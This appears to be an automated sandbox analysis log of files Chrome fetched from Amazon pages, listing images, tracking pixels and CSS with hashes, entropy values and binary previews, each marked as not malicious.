                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............h.j....PLTE....../8B..................EIRtw~{~.8=G7<F;@J>CMAFP...:?H<AJ?DM@ENCHQBGPFKT5;EDIQFKSEJRQV^6<E8>GOWctx~sw}......CKVJR]:@H<BJ=CK@FN`el}.....:DP6?JEP]6>H9AK;CMCKUBJTnw.t|......................09C1:D>IU3<F?JV9CN4=G5>H>HSDNYDMW=EN?GPAIRBJSDLUXbmGOXHPYkt~eltx..qw~AMY6@J7@IIT_;DM=FOMWaHQZ\fpU]eu{..............................................CMVcmv...ry...................................................#..&..(..*..+..-.....0..3..4..6..9..=..>.<..@..C..@..D..G..H.D..K..O..R..M..V..T..g..n..p..r..r..t..u..v..x...................................&..2..=..L..U..\..c..m..x...............................................................................................................................{{{tttkkkeeeZZZRRRKKKFFF@@@<<<666333***$$$.....................`.FB....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9416
                                                                                                                                                                                                                                                                Entropy (8bit):7.858682165622051
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Yz5bN2/h9nsM4q9xe9XBfssssssssssLQkVts7uxjCG6IimDB:M2/yqbe7ssssssssssLQkVa7uxjZnDB
                                                                                                                                                                                                                                                                MD5:66FD5911E870575C02253E729B4DBEFE
                                                                                                                                                                                                                                                                SHA1:348414EAEBDB79AC5C031F2081FCD84FDF066C4B
                                                                                                                                                                                                                                                                SHA-256:D4E22F8480F3D391BF5CD2255CBA9CA5322CCDF7C5853671D6CC21FE12E870E6
                                                                                                                                                                                                                                                                SHA-512:70B7D7DC3F99D540A759148ABC81FB9CE7921FB2CE449B87129809F858427296C421A6E2869447744EF8FD4DC270A7980461F060C986423709972A0CBEFE166B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259749_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........4...........................................................................x8.}W.=.).{r...-......{...............[}.. .........=..{..5..t.[).l."..........=..i.V.C`......=.....2..L...D:........4q...KD<......m,..Y.Y.....;..Vt..I>:\Mh#....Oy.....H$.......C...Q......%..9YVN....tyYR.....{=O<X......N~..nBH@....=.i.5......Mh..86.....f.._.'....?.0........z.}.......{sF..C`.....b-h...-.*.*........q.;...d.y.............'..].GP.........=..x.......x........W..H........Y.............`.......|...E...G.....@.......%..)w........~.N..r./(..a...G......oS.y..{......JaCT.........w.gI.X..N...F.^..w.....~n;.n}|..G.s.uC.>.......647..*.)..R......u..t...&..&..6..{.~8............)5 .Km.s..q......ZZS.].S\.y........]/7.gJ.....Z.[.px..:.....v...$......~g'U..._E .........k...{..|.........t......4;..<
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26sw%3D1280%26sh%3D1024%26vw%3D1280%26vh%3D907%26m%3D1%26sc%3D2T6Z4AC3VMBGX01C1EVN%26ue%3D41%26bb%3D1195%26cf%3D1211%26be%3D1218%26fp%3D1264%26fcp%3D1264%26pc%3D4776%26tc%3D-483%26na_%3D-483%26ul_%3D-1723469067366%26_ul%3D-1723469067366%26rd_%3D-1723469067366%26_rd%3D-1723469067366%26fe_%3D-481%26lk_%3D-471%26_lk%3D-471%26co_%3D-471%26_co%3D-402%26sc_%3D-471%26rq_%3D-402%26rs_%3D-27%26_rs%3D156%26dl_%3D-23%26di_%3D1269%26de_%3D1269%26_de%3D1269%26_dc%3D4775%26ld_%3D4775%26_ld%3D-1723469067366%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D40%26hoe%3D41%26ld%3D4776%26t%3D1723469072142%26ctb%3D1%26rt%3Dcf%3A3-0-3-0-1-0-1__ld%3A15-12-3-0-2-0-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Cfls-eu-amazon-com%7Cadblk_no%7CperfYes%7Cfy_cdn_fr%7Cak_cdn_mp%7Ccsm-feature-touch-enabled%3Afalse%7CmutObsActive%26viz%3Dvisible%3A41%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:4780
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (26050)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):211442
                                                                                                                                                                                                                                                                Entropy (8bit):4.995329379690653
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:rInH2o3pouSXmkglKEKajAQlkEXZKt4ReJRYMsg3rzuD:snHcYMsgvuD
                                                                                                                                                                                                                                                                MD5:E3CA150EB0211E76C6AEB5AB8E9A96BA
                                                                                                                                                                                                                                                                SHA1:5F65A85C6EF6505EA9551A6D4A1860D0338E6133
                                                                                                                                                                                                                                                                SHA-256:7E0B4D146AC07022EBE6CF7B5C82AE49DBFDA8958EF6BA95EF236C4B98D10A08
                                                                                                                                                                                                                                                                SHA-512:9A0821BB269A51E3D987E2E7FACD7F88A79C2F979EEE165A0FC85CAAC67312BC7D2C8BBEB2485A2DE5371186B952202535924F77204C590C977B856388457841
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9"
                                                                                                                                                                                                                                                                Preview:button,input,select,textarea{font-family:inherit}h1,h2,h3,h4,h5,h6{padding:0;margin:0}h1,h2,h3,h4{padding-bottom:4px}h1,h2,h3,h4{text-rendering:optimizeLegibility}h1:last-child,h2:last-child,h3:last-child,h4:last-child{padding-bottom:0}h1.a-spacing-none,h2.a-spacing-none,h3.a-spacing-none,h4.a-spacing-none{padding-bottom:0}h1 .a-size-base,h1 .a-size-mini,h1 .a-size-small,h1.a-size-base,h1.a-size-mini,h1.a-size-small,h2 .a-size-base,h2 .a-size-mini,h2 .a-size-small,h2.a-size-base,h2.a-size-mini,h2.a-size-small,h3 .a-size-base,h3 .a-size-mini,h3 .a-size-small,h3.a-size-base,h3.a-size-mini,h3.a-size-small,h4 .a-size-base,h4 .a-size-mini,h4 .a-size-small,h4.a-size-base,h4.a-size-mini,h4.a-size-small{padding-bottom:0}h1,h2{padding-bottom:4px}h3,h4{padding-bottom:4px}.a-size-medium .a-row.a-size-base,h1 .a-row.a-size-base,h2 .a-row.a-size-base,h3 .a-row.a-size-base,h4 .a-size-large .a-row.a-size-base{padding-top:1px}.a-size-base .a-row.a-size-base{padding-top:0}.a-size-micro{font-size:10px;l
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D4844%26at%3D4844%26t%3D1723469068780%26csmtags%3DendVL%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4844
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D4533%26pc%3D7460%26at%3D7460%26t%3D1723469074826%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7460
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1599
                                                                                                                                                                                                                                                                Entropy (8bit):7.544935724436636
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6v2bWPXa9bS7/RabWbFpD5g83FxL1WybbbR:TZv2bWfa2/MbWbFpD5FDUybbbR
                                                                                                                                                                                                                                                                MD5:7E3BE9F05D717AA9B5B8EFF87A0DB2ED
                                                                                                                                                                                                                                                                SHA1:FA4129AEAF2B91E5B9009176F318CE1A93F53BD7
                                                                                                                                                                                                                                                                SHA-256:8B4A307A0EA37F59D262F1209CD84A84FCCD4613335A97D9BD7D232646C610A4
                                                                                                                                                                                                                                                                SHA-512:A0DBA04BCFAB074F305FAC0F8F50C98919CD21B1BD7FCD1210D87BA4C3E42408F28BD003A5946D3246BD3C448FB5EAD2BC4FFB318E8E4040F6B4100DD32901DF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........x......................................................!1Q.q.."ARab....#2BSc..$s...................................................?...D@DD.D@DD.UZ.j.f...N.!.i......o........fV.)W..e.F..v.,q..0B..p%.................j}..J...j....[..N.&....Vcf.-.a...{...Ihk.=.......a..../..7.......#.-.PqA..s.Q..3.jF.."dM..'...j..t.{3\.....+....................B.Q.r.L.............I..........p...F....4.@,...e.J.67r.]....;.v..)...Y..(f./.A....F....}.._6.....l^.5..;...(={7..0*RL4..y..a.E6V..!c".h.5.h..4...D@DD.D@DD.D@X.n...=...p.......`....X(...N.y.X.(:9..<...i.].._...:..b......78..:.}$.Z"..%X...v-.....C=..3..F....cX.0.V....2@...w...S.:.2...Lz.1.....@.H...............`.......].b..P...p&I.f0_...R...!.]..B....4..\yV+jc..lL....,.N.........X1..F.._+...u.-..B?.....R..9..o...+..<......K..............\...P.?..i..O
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):104532
                                                                                                                                                                                                                                                                Entropy (8bit):7.785419294343592
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:W5qXgyzFQLu3a8B2VfvJUWBwCAyaz2E04u1+F3D:ApyzOLuFiJBBOyrE9/D
                                                                                                                                                                                                                                                                MD5:C859453C5A860A0988C7149359649B9E
                                                                                                                                                                                                                                                                SHA1:A2ACAADB198216098F088C8B6F39DD836CC490EB
                                                                                                                                                                                                                                                                SHA-256:81324FBAD4811167FA4D2B1559909ACEED6C0C2B8E09477B0CA6290DD92643C5
                                                                                                                                                                                                                                                                SHA-512:E78998A1E90D108C7B4B507A3402D32A4F085F40749AEA59FB8DB33FB73F4C3CD5461781B95479AB3F6CE97579A1D006853B3AE35C844724075D404012F21D34
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61fayACTHOL._SX3000_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF................................................................#"""#''''''''''..................................................!! !!''''''''''..........."..........4................................................................................................................................................Q........`..E...T.....@......P..X.%..........aH.......=.Y...zy.........,....P.....(...,J.../`<............................................................................. .@.....(.YH....Y@........(.....K.... ...... (........mN.Sw..]. .@Y@.U...e... .,..,..(.....D....@.............................................................................`Y@.....(. ....(%...K......,%.%.E.H...P. ,..Q(........(...<...i.y.......eU......%.PJ.J.....P.T.^.y...................................................................................'P;k..u..t.t.t.t.t.t.t.t.t.u...wc..q.(.,,...B...........(.PK........e.J".Ae%.Q,(..,...|r..`...RP..P...@.e.PZ..P..!e(.VY@..............
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2132
                                                                                                                                                                                                                                                                Entropy (8bit):7.754854253062559
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rVLPMNn4fEYWfsmojwRTt04o5LW4PA+YmDNv55/uybbsA8:TEfqfwst04o444+YmDBK
                                                                                                                                                                                                                                                                MD5:42E5B8A2E632B2CD6F4EF7B2163CAB99
                                                                                                                                                                                                                                                                SHA1:95984EC0C369FD16EE0A6120AB8D1551060ADFEC
                                                                                                                                                                                                                                                                SHA-256:D027D4A2602C1A135247F7864B96CC2FA6FC743AEEAD6119E6B85B7B46AFC93C
                                                                                                                                                                                                                                                                SHA-512:8D8B1FC4682151497CD7AA02047D92B20DCB3370FA1B814F37C6AAD99B0024A82C5390B17912BCF527A575F0AF42D9A3B74734E53A0073645E13FF5A6279A4D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1A..Qa."...#2q....$Rbt...............................................!1.A.."2............?...D@...DD.J*....L.u..1.o...W.X=Q./.(.......2..W?..E.h..+.*c...,N<....:u?f..fN.K..^...E.rpB" ...""...." .B.(.oW_[b.U...n...p...m._....L...VW.z....|..V...f.K%F@.H&'K..v#..f...r.b...ed1......#].6X...$.s.lE..<.O....8`$....2....K.5U......X..[..$5N.i.:..e..7+q.....=.U.k..B.=.q.dpc.9.-.<.+`....d.R.tp...DD....D@.......5....0\.e.%.E..Q].......J.|.l...w/....B_...}4.5.-......<<.Q..u.....#h.2Z...*.(ie....q'..B..eg..g~.~......_.M...c../..4r.ER..rT.I.G0?6.x..o...s.[.$.o.o..v...<LY..h../.u.tT.A..c.>..{>u...DE..DD....D@...!HE.U.i...$.m..9#...]..7..1....$.l1R<..%.{.a.mp......s.z.M]......Be{....0:.....zK{....,.....X.K..*|I.{,...c..>_8....5..4..)%....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8865
                                                                                                                                                                                                                                                                Entropy (8bit):7.881132938956866
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Y1cVEDjZAvmuIcq09pk4IYIhmJPjfr+UYN36:Y64jGeMpk4IYDJPjyUYd6
                                                                                                                                                                                                                                                                MD5:B05B81750794CA693E9589C0A171634F
                                                                                                                                                                                                                                                                SHA1:FA91375275E3E1C8FCD8F79BCAE5D85593A33C67
                                                                                                                                                                                                                                                                SHA-256:FF24D4B094AB1896672F4C8D387150C74BBB2493F7D01BEA7C87247AA0AB3BB5
                                                                                                                                                                                                                                                                SHA-512:0C1FBBBD92EAD677C12E4B8CC40239FF66D90A899180C0816A4827F982CB45DD259D24BBC08C34FF737BDE5D3BA3638FF99CA33F77D7C0D640B6970969D3B5EB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a@.@............................!..NETSCAPE2.0.....!..XMP DataXMPa1a8-9458-1177-8dcc-94086be1eca9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.!.......,....@.@....h..#.@*)..1..`.P.v.......p...e..}...7.Zm.[....O&$..#J...HN.4%=...F`H..n..4<+g+....F...I....u.ayn=>.u.K.dTw...Ln..w..u.1c.}...u.~.I...;G`..p....]........j..-....@j.My....R...$$....R.4.p.0..........G..p..!]}....0.vxq...]..(T..`...r.. ."...Z,c.@.....P..%.c.w..t..g`...Q..p.C..+M.."fK^.r..Q.M.6...S..FE..........*...Uo....J..>.v`..+W.:.,{....i.bl{...j..(.....w=...o1.p=H..vC.]...&....;.8f\.... .T.m.....$..\.....W;F..4h&.Y..3..*.so..-B..#...Z....uB.....KAd...`.w....|x.....?.||...O..9.w.Y..O..m......x..d.~.R.To.IvI..!.......,....@.@....x....H..8.3...TP[i2Q....g...8..[..-.....+...a.fDj............8....+.....&Ue.....a.e....`.n;t@z.f........jw.\.....v?\f...(z.z........k....H.........~@...G........v.....^...H.....N......e......a..........e.....e.......W......,Pp.A........:|..2,(..c.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 123x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8289
                                                                                                                                                                                                                                                                Entropy (8bit):7.958049715034123
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:bSNyt2iR/i0LIrFQg/71ayUGURZ8tFXlxwM1Zx+PuJ:bSIh/aFazF8rxlJ
                                                                                                                                                                                                                                                                MD5:FCFB0ADA0BD17CC4924959AA01103D08
                                                                                                                                                                                                                                                                SHA1:5EE6466E1DC6A17E4EEC44BDF07C65A4795921E0
                                                                                                                                                                                                                                                                SHA-256:FBC6BA56AE9E180F9CC588EDDC30BB4EBA8A83C35430BC1BD05C02890F7345FB
                                                                                                                                                                                                                                                                SHA-512:263A99D097F871569B2044BE92DDB2DE8C9BFFE357C91040ACFB6FE6FF5EEC888E16C3DD5209725234281F9BAD6B37A933BDCB56BC2C4068D3DC4EED2F945284
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81Kd47aq+QL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........{..".............................................................!.1."AQ.a.2q...#3BS....R.....%DT....4bs.d..................................................!..1Qq23A.#$4ar......."C.............?......<b.^...<<..../_.O..#A.|.. .SI0.}........={v.,.q..y......O........>...v.u.*zs?.........&..W%.^J..n....B........+.@.iv..T..$m...<.rE.<.x..Q...Y..E.jC.>.A.}...G.A7.....Z*#.....Fc]..T+.....K..j.2...,.G..5.....iO..a..l.92w...Q........Y..w.....20..`l_..Ls1...|...Ro....*...U%.u/.Z.<..1..Z.....f..|...]z.#p.d..o...W....vc=...rh.....z.mV)..J..F...y2..3...*.6...\..m....za. .c.....Qc..........e.$.i.{..W....j<i!.w..w0..4aH..X.n..9R.{.....O.`..x.;.>.S|&.&.e..K.._.7a............)b.F..-|..ThZ......W4.t:..X.qe.B....k...wQ||.....r.....H#..W.>......./....^....b.o..7.(....y......X.8.>..?n...D...A7.i}.....t...!O.M..|...H....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3342
                                                                                                                                                                                                                                                                Entropy (8bit):7.840320252685138
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TYrGcQ+513X6lzRQGY5eaPWZ4MCIMiRjDn7fx:E9bKlFTY5eaPWkQD7fx
                                                                                                                                                                                                                                                                MD5:9D3C61950CD2F3B887731B1854EC0667
                                                                                                                                                                                                                                                                SHA1:ECC2D8501C0E4AEB2D2B0DAD018530AC0ADBB62D
                                                                                                                                                                                                                                                                SHA-256:B3FD6FE4EC795F8594E0F547089CBFB4B54FBCF9491C071CF5735A5F1B16E2F3
                                                                                                                                                                                                                                                                SHA-512:0D6F4A8B6CECADDFDA66C557F4D6A87F27CB3DDF0681F059EDBCA00CEEADC1E7D398CBB5DF6EBDF79DCCEEBAAEC4E80727F71F208081528D2748EB8F3E2B6DF7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1..Aq."Qa.2..BR...#c.$3d.................................................!1.a."A..Q.............?...R.%.)J.JR.R......I...5.sskh..il....@......]u7...MJ........mB.....J...h...0_...O.KL..+...#(.y.k...u...O.k....D..J.?.A..a..^..<..m.C......>.B.)J.JR.R....(.)J.JR...+..,..awVr..........a.^.p..;x.Y.B.[.kT..7.zz.{.f...7./..,.*l9...w1'.......8.+oN~....[Ek..m....7.O]../.z..*....F.;......C....6d...9.............^....,.c....N...nGn...i..sa.....g....G..\6.........T.2.*...C.."Q.l.}1..*...(u.........'......3....EZ3R..w....k..h.c......Lf.Z..k..P..1h...6.2...2..x......oHQ.t..TC.G-......1.X..)B.)J.JR.R....Ag...FA.q..k....u..H4..]..>..>...N...O....h.T^6+J......t...u...E....V(.. 9..|of.-Bv..-.=...j..svc....y....f.PH..........eI~x.Y..d!...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10733
                                                                                                                                                                                                                                                                Entropy (8bit):7.885934182718208
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Ym0kcHGqaV4LMM67mdanbf/gmmj2HiZrPRGmU3r8r93rZlS2oztBfubDX8PbmtYD:PoHGqaV4LxonjgmFkrPQTr8r9jSR1ABC
                                                                                                                                                                                                                                                                MD5:41E60F7A1D6139539601FABD8F36C3CB
